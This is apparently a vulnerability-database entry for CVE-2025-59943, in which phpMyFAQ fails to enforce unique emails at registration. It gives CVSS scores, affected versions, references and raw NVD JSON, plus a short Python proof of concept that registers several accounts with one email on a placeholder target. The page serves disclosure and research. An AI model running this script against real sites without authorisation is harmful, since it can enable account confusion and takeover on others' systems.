CVE-2025-59943

Description

phpMyFAQ is an open source FAQ web application. Versions 4.0-nightly-2025-10-03 and below do not enforce uniqueness of email addresses during user registration. This allows multiple distinct accounts to be created with the same email. Because email is often used as an identifier for password resets, notifications, and administrative actions, this flaw can cause account ambiguity and, in certain configurations, may lead to privilege escalation or account takeover. This issue is fixed in version 4.0.13.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:phpmyfaq:phpmyfaq:4.0.7:*:*:*:*:*:*:* - VULNERABLE

phpMyFAQ < 4.0.13

phpMyFAQ 4.0-nightly-2025-10-03及以下

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-59943 PoC - phpMyFAQ Email Uniqueness Bypass # This PoC demonstrates registration of multiple accounts with the same email import requests TARGET_URL = "http://target-phpmyfaq.example.com" REGISTER_ENDPOINT = "/register.html" # Adjust path as needed # Common email used for all duplicate registrations TARGET_EMAIL = "[email protected]" # User accounts to create with the same email accounts = [ {"username": "attacker1", "email": TARGET_EMAIL, "password": "Pass1234!"}, {"username": "attacker2", "email": TARGET_EMAIL, "password": "Pass5678!"}, {"username": "attacker3", "email": TARGET_EMAIL, "password": "Pass9012!"}, ] session = requests.Session() for i, account in enumerate(accounts): print(f"[*] Attempting to register account {i+1} with email: {account['email']}") # Step 1: Fetch registration page to obtain CSRF token if needed resp = session.get(f"{TARGET_URL}{REGISTER_ENDPOINT}") # Extract CSRF token from the page (implementation depends on phpMyFAQ version) # csrf_token = re.search(r'name="csrf" value="([^"]+)"', resp.text).group(1) # Step 2: Submit registration form with duplicate email data = { "username": account["username"], "email": account["email"], "password": account["password"], "password_confirm": account["password"], # "csrf": csrf_token, # Include if CSRF protection is present } resp = session.post(f"{TARGET_URL}{REGISTER_ENDPOINT}", data=data) if "success" in resp.text.lower() or resp.status_code == 200: print(f"[+] Account {i+1} created successfully with duplicate email!") else: print(f"[-] Account {i+1} registration failed") print("[!] Vulnerability confirmed: Multiple accounts registered with the same email address")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59943
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59943
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59943/
[4] VulDB https://vuldb.com/cve/CVE-2025-59943
[5] https://github.com/thorsten/phpMyFAQ/commit/44cd20f86eb041f39d1c30a9beefad1cc61dc0ec
[6] https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9wj2-4hcm-r74j
[7] https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9wj2-4hcm-r74j

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59943", "sourceIdentifier": "[email protected]", "published": "2025-10-03T21:15:34.757", "lastModified": "2025-10-10T16:35:13.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpMyFAQ is an open source FAQ web application. Versions 4.0-nightly-2025-10-03 and below do not enforce uniqueness of email addresses during user registration. This allows multiple distinct accounts to be created with the same email. Because email is often used as an identifier for password resets, notifications, and administrative actions, this flaw can cause account ambiguity and, in certain configurations, may lead to privilege escalation or account takeover. This issue is fixed in version 4.0.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-286"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpmyfaq:phpmyfaq:4.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "58302DB6-BBFD-41DD-B093-5AABA119E068"}]}]}], "references": [{"url": "https://github.com/thorsten/phpMyFAQ/commit/44cd20f86eb041f39d1c30a9beefad1cc61dc0ec", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9wj2-4hcm-r74j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9wj2-4hcm-r74j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}